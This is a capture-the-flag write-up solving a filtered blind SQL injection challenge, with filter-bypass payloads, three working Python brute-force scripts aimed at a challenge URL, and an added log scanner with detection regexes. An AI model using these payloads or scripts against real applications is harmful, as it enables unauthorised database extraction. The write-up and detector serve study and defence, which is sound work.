The challenge hint says this is a SQL injection task.
Opening the challenge, we guess that the injection point is the id parameter.
After some testing, we find that the challenge filters the union keyword, single quotes, commas and spaces.
Solution
1. With union filtered, union-based injection is out, so we try boolean-based blind injection.
2. Commas are filtered, so we use mid(username from 1 for 1) instead of mid(username,1,1),
and limit 1 offset 1 instead of limit 1,1.
3. Spaces are filtered, so we use inline comments in their place.
4. Single quotes are filtered, so we use ord() to convert the character under test to its ASCII code and compare numbers instead.
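From the defender's side, the same four bypasses are also a detection signature. As an added example (not part of the original writeup), here is a small Python scanner that normalises inline comments back to whitespace and flags query parameters showing the mid(... from ... for ...), limit/offset, ord(...) in(N) and information_schema patterns; the access-log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit
# Constructed sample access-log lines (not from the original post). Lines 1-2
# carry the comment-separated blind payload shape from the writeup (line 2
# percent-encoded); lines 3-4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database())/**/limit/**/1/**/offset/**/0)/**/from/**/1/**/for/**/1))/**/in(97) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=-1%2F%2A%2A%2For%2F%2A%2A%2Ford(mid((select%2F%2A%2A%2Fflag%2F%2A%2A%2Ffrom%2F%2A%2A%2Fflag)%2F%2A%2A%2Ffrom%2F%2A%2A%2F1%2F%2A%2A%2Ffor%2F%2A%2A%2F1))%2F%2A%2A%2Fin(99) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1&page=2 HTTP/1.1" 200 512
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# One rule per bypass technique the writeup relies on, applied after inline
# comments have been turned back into whitespace.
RULES = {
    "mid_from_for": re.compile(r"\b(mid|substr|substring)\s*\(.*\bfrom\b.*\bfor\b", re.I | re.S),
    "limit_offset": re.compile(r"\blimit\s+\d+\s+offset\s+\d+", re.I),
    "ord_in_compare": re.compile(r"\bord\s*\(.*\)\s*in\s*\(\s*\d+\s*\)", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}

def analyse_request(target: str) -> dict:
    """Return {param: [rule names]} for every query parameter that trips a rule."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote_plus(raw)            # unwrap one extra layer of encoding
        matched = ["comment_as_space"] if COMMENT_RE.search(value) else []
        norm = COMMENT_RE.sub(" ", value)    # /**/ was standing in for a space
        matched += [rule for rule, rx in RULES.items() if rx.search(norm)]
        if matched:
            hits[name] = matched
    return hits

def scan_log(text: str) -> list:
    """Return (line_no, client_ip, hits) for each log line that trips a rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if m:
            hits = analyse_request(m.group(1))
            if hits:
                findings.append((n, line.split()[0], hits))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the two injected lines are reported; the benign id=42 and id=1&page=2 requests produce no findings.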
Now let's write a Python script to run it.
Getting the table names

    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    # /**/ replaces every space in the query, since spaces are filtered (point 3 above)
    for n in range(0, 2):  # brute-force the first two table names
        table_name = ''
        for i in range(1, 10):  # positions 1 to 9 of the name (we guess it is shorter than ten characters)
            for char in chars:  # try every candidate character
                params = {
                    "id": "-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database())/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in(" + str(ord(char)) + ")"
                }
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:  # the true branch of the page contains "If"
                    table_name += char
                    break  # found this position, move on to the next one
        print(table_name)
Getting the column names

    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    # 0x666c6167 is the hex encoding of 'flag', which avoids the filtered single quotes
    for n in range(0, 1):  # only the first column
        column_name = ''
        for i in range(1, 10):  # positions 1 to 9 of the column name
            for char in chars:
                params = {
                    "id": "-1/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/in(0x666c6167)/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in(" + str(ord(char)) + ")"
                }
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:
                    column_name += char
                    break
        print(column_name)
Getting the column value

    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    for n in range(0, 1):  # only the first row
        flag = ''
        for i in range(1, 50):  # positions 1 to 49 of the flag
            for char in chars:
                params = {
                    "id": "-1/**/or/**/ord(mid((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/" + str(n) + ")/**/from/**/" + str(i) + "/**/for/**/1))/**/in(" + str(ord(char)) + ")"
                }
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:
                    flag += char
                    break
        print(flag)
Getting the flag: the value printed by the last script is the flag.
Daily sharing from a CTF newbie; comments from the experts are welcome.